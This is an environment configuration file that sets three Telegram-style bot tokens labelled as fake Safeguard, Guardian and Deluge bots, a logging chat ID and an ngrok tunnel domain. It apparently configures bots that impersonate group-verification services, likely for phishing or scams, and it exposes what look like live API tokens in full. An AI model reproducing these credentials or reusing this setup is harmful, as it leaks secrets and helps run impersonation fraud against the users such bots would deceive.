PORT=3000
FAKE_SAFEGUARD_BOT_TOKEN=7246140914:AAEO3qydR1sK144G3lY8u7tMZwLhXSgTZzk
FAKE_GUARDIAN_BOT_TOKEN=8093020736:AAG0do5trKVC-SLhvomv9BLKTYuUtRfKDBw
FAKE_DELUGE_BOT_TOKEN=7928340052:AAEFIuBLecTDFmklDbAeNckvaaye0j2IaJw
LOGS_ID=-1002536967449
DOMAIN=https://41de-87-212-11-105.ngrok-free.app